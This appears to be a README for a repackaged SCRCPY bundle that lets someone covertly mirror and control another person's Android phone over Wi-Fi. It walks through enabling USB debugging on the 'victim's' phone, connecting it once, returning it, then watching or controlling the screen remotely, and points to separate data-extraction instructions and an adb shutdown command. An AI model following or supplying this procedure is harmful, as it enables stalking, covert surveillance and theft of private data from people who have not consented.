📲 Mirror & Control Android Device via IP
🛠️ Based on Genymobile's SCRCPY — Modified into a portable, one-click solution.
📄 Legal & Credits 🧑💻 Modified and packaged by: dark_efx
👨🔬 Based on Genymobile's SCRCPY
- 🧠 Basic Knowledge: You must know the victim’s local IP address (e.g.,
192.xxx.xxx.xx).
⏱️ Takes just 10 seconds to find. (SeeREADME.txt) - 📱 Android Device Only
- 🔌 Initial USB Connection is mandatory (only once).
- 🔧 USB Debugging Enabled:
- Go to
Settings > About phone > Tap "Build number" 7 times - Then go to
Developer options > Enable USB debugging
- Go to
- Extract the ZIP to any desired folder.
- Paste the
.batfiles (OneClickSCRCPY.bat,Watch.bat, etc.) into the same extracted folder. - Edit each
.batfile and replace the placeholder IP (<IP>) with the actual IP of the Android device.- 🔍 Find IP via:
Settings > Wi-Fi > Tap connected network > Scroll to IP address
- 🔍 Find IP via:
- Connect phone via USB.
- Run
scrcpy-connect.bat(auto connects device via IP). - After success, disconnect the cable and return phone to the victim.
- Watch Only: Run
Watch.batto view the Android screen. - Full Control: Run
OneClickSCRCPY.batto view and control the screen. - 📂 Data Copy: See
Data Copy.txtfor file/data extraction instructions.
# List devices
adb devices
# Manually connect to a device via IP
.\scrcpy -s <IP>:5555
❌ If connection fails with a new device:
adb disconnect
adb kill-server
adb start-server💡 If .bat files open in PowerShell by default, add .\ before the scrcpy command inside the batch file.
.
🔌 Shutdown Android Device via Command
adb -s <IP>:5555 shell input keyevent 26